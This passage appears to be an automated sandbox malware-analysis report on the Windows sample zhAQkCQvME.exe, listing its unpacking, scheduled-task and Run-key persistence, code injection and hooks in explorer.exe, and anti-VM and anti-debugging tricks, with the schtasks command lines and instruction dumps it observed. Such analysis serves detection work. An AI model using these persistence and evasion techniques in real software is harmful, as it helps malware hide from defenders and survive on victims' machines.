Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

PE file contains a debug data directory

Show sources

Source: zhAQkCQvME.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 0.2.zhAQkCQvME.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 1.2.zhAQkCQvME.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 2.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 5.2.zhAQkCQvME.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 6.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 7.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 14.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 17.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 18.2.jkfkdm.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;CODE:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 0.2.zhAQkCQvME.exe.400000.1.unpack
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 1.2.zhAQkCQvME.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 2.2.jkfkdm.exe.400000.1.unpack
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Unpacked PE file: 5.2.zhAQkCQvME.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 6.2.jkfkdm.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 7.2.jkfkdm.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 14.2.jkfkdm.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 17.2.jkfkdm.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Unpacked PE file: 18.2.jkfkdm.exe.400000.1.unpack

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00407A30 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00407A30

PE file contains an invalid checksum

Show sources

Source: jkfkdm.exe.0.dr	Static PE information: real checksum: 0x36016 should be: 0xb495e
Source: zhAQkCQvME.exe	Static PE information: real checksum: 0x36016 should be: 0xb495e

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\explorer.exe	Code function: 12_2_0040ACE6 push ebx; ret	12_2_0040ACE7
Source: C:\Windows\explorer.exe	Code function: 12_2_0040AA34 push cs; iretd	12_2_0040AB0A
Source: C:\Windows\explorer.exe	Code function: 12_2_0040AB36 push cs; iretd	12_2_0040AB0A
Source: C:\Windows\explorer.exe	Code function: 12_2_0153212C push cs; iretd	12_2_01532202
Source: C:\Windows\explorer.exe	Code function: 12_2_0152B043 push 0000006Ah; retf	12_2_0152B11C
Source: C:\Windows\explorer.exe	Code function: 12_2_0152B0AB push 0000006Ah; retf	12_2_0152B11C
Source: C:\Windows\explorer.exe	Code function: 12_2_0152B0AD push 0000006Ah; retf	12_2_0152B11C
Source: C:\Windows\explorer.exe	Code function: 12_2_015323DE push ebx; ret	12_2_015323DF
Source: C:\Windows\explorer.exe	Code function: 12_2_01535260 push esp; ret	12_2_01535264
Source: C:\Windows\explorer.exe	Code function: 12_2_0153222E push cs; iretd	12_2_01532202
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015F3D7E push ebx; ret	19_2_015F3D7F
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015F3BCE push cs; iretd	19_2_015F3BA2
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015F3ACC push cs; iretd	19_2_015F3BA2
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013D3BCE push cs; iretd	21_2_013D3BA2
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013D3ACC push cs; iretd	21_2_013D3BA2
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013D3D7E push ebx; ret	21_2_013D3D7F
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011F3BCE push cs; iretd	24_2_011F3BA2
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011F3ACC push cs; iretd	24_2_011F3BA2
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011F3D7E push ebx; ret	24_2_011F3D7F
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011D3BCE push cs; iretd	25_2_011D3BA2
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011D3ACC push cs; iretd	25_2_011D3BA2
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011D3D7E push ebx; ret	25_2_011D3D7F

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\Desktop\zhAQkCQvME.exe			Jump to dropped file
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn ahizzkkevf /tr '\'C:\Users\user\Desktop\zhAQkCQvME.exe\' /I ahizzkkevf' /SC ONCE /Z /ST 19:29 /ET 19:41

Contains functionality to start windows services

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00401420 StartServiceCtrlDispatcherA,

0_2_00401420

Creates an autostart registry key

Show sources

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tjmptzibr			Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tjmptzibr			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: TranslateMessage new code: 0xE9 0x91 0x10 0x02 0x2F 0xF4

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe

Memory written: PID: 2600 base: 5102D value: E9 2E 1A 3A 00

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to compare user and computer (likely to detect sandboxes)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: GetModuleHandleA,GetModuleFileNameA,StrStrIA,		0_2_0040B120
Source: C:\Windows\explorer.exe	Code function: GetModuleHandleA,GetModuleFileNameA,StrStrIA,		12_2_003FB120

Contains functionality to detect virtual machines (IN, VMware)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040B450 in eax, dx

0_2_0040B450

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Windows\explorer.exe

Stalling execution: Execution stalls by calling Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: explorer.exe, 0000000C.00000003.535514712.0161F000.00000004.00000040.sdmp, taskhost.exe, 00000013.00000002.759557288.0294F000.00000004.00000040.sdmp, dwm.exe, 00000015.00000002.761415105.01BEF000.00000004.00000040.sdmp	Binary or memory string: OLLYDBG.EXE
Source: dwm.exe, 00000015.00000002.761415105.01BEF000.00000004.00000040.sdmp	Binary or memory string: OLLYDBG.EXEP
Source: explorer.exe, 0000000C.00000003.535514712.0161F000.00000004.00000040.sdmp	Binary or memory string: OLLYDBG.EXECJ
Source: explorer.exe, 0000000C.00000003.535514712.0161F000.00000004.00000040.sdmp, taskhost.exe, 00000013.00000002.759557288.0294F000.00000004.00000040.sdmp, dwm.exe, 00000015.00000002.761415105.01BEF000.00000004.00000040.sdmp	Binary or memory string: WINDBG.EXE
Source: explorer.exe, 0000000C.00000003.535514712.0161F000.00000004.00000040.sdmp	Binary or memory string: WINDBG.EXEDJ

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	RDTSC instruction interceptor: First address: 401330 second address: 401336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 mov edi, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	RDTSC instruction interceptor: First address: 401330 second address: 401336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 mov edi, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	RDTSC instruction interceptor: First address: 401336 second address: 401330 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, edx 0x00000004 mov ecx, eax 0x00000006 mov eax, dword ptr [esp+44h] 0x0000000a add eax, eax 0x0000000c mov edx, dword ptr [esp+40h] 0x00000010 adc edx, edx 0x00000012 mov dword ptr [esp+70h], eax 0x00000016 mov dword ptr [esp+74h], edx 0x0000001a sub ecx, edi 0x0000001c mov eax, dword ptr [esp+30h] 0x00000020 test eax, eax 0x00000022 mov dword ptr [esp+70h], FF0832F0h 0x0000002a mov dword ptr [esp+74h], FFFFFFFFh 0x00000032 mov edx, dword ptr [esp+34h] 0x00000036 cmove edx, ecx 0x00000039 mov dword ptr [esp+70h], A6C64046h 0x00000041 cmp eax, 00000000h 0x00000044 mov edi, dword ptr [esp+2Ch] 0x00000048 cmove edi, ecx 0x0000004b cmp edi, ecx 0x0000004d cmovnbe edi, ecx 0x00000050 mov dword ptr [esp+58h], edi 0x00000054 mov di, word ptr [esp+6Eh] 0x00000059 cmp edx, ecx 0x0000005b cmovb edx, ecx 0x0000005e mov word ptr [esp+6Eh], di 0x00000063 mov dword ptr [esp+4Ch], edx 0x00000067 add eax, 01h 0x0000006a mov ecx, dw

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1			Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040AE50 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

0_2_0040AE50

Contains functionality to read device registry values (via SetupAPI)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040AC10 SetupDiGetDeviceRegistryPropertyA,GetLastError,

0_2_0040AC10

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\System32\cmd.exe

Dropped PE file which has not been started: C:\Users\user\Desktop\zhAQkCQvME.exe

Jump to dropped file

Found evasive API chain (date check)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\explorer.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\notepad.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\taskhost.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found evasive API chain checking for process token information

Show sources

Source: C:\Windows\explorer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\dwm.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\conhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\taskhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\notepad.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe TID: 1500	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe TID: 2376	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2396	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe TID: 2428	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2440	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2464	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1988	Thread sleep time: -780000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2112	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2112	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2500	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2924	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe TID: 2056	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1892	Thread sleep time: -6240000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1892	Thread sleep time: -60000s >= -30000s	Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\explorer.exe

Code function: 12_2_0151B870 FindFirstFileW,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,

12_2_0151B870

Contains functionality to query system information

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00409F40 GetSystemInfo,

0_2_00409F40

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: explorer.exe, 00000016.00000000.606027780.031C6000.00000004.00000001.sdmp

Binary or memory string: vmbusres.dlld

Program exit points

Show sources

Source: C:\Windows\explorer.exe

API call chain: ExitProcess graph end node

Queries a list of all running processes

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040AE50 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

0_2_0040AE50

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00407A30 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00407A30

Contains functionality to read the PEB

Show sources

Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015FCDB0 mov eax, dword ptr fs:[00000030h]	19_2_015FCDB0
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_004C0000 mov eax, dword ptr fs:[00000030h]	19_2_004C0000
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013DCDB0 mov eax, dword ptr fs:[00000030h]	21_2_013DCDB0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013DCDB0 mov eax, dword ptr fs:[00000030h]	21_2_013DCDB0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_001E0000 mov eax, dword ptr fs:[00000030h]	21_2_001E0000
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011FD090 mov eax, dword ptr fs:[00000030h]	24_2_011FD090
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011FD090 mov eax, dword ptr fs:[00000030h]	24_2_011FD090
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_01250000 mov eax, dword ptr fs:[00000030h]	24_2_01250000
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011DCDB0 mov eax, dword ptr fs:[00000030h]	25_2_011DCDB0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011DCDB0 mov eax, dword ptr fs:[00000030h]	25_2_011DCDB0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011F0000 mov eax, dword ptr fs:[00000030h]	25_2_011F0000

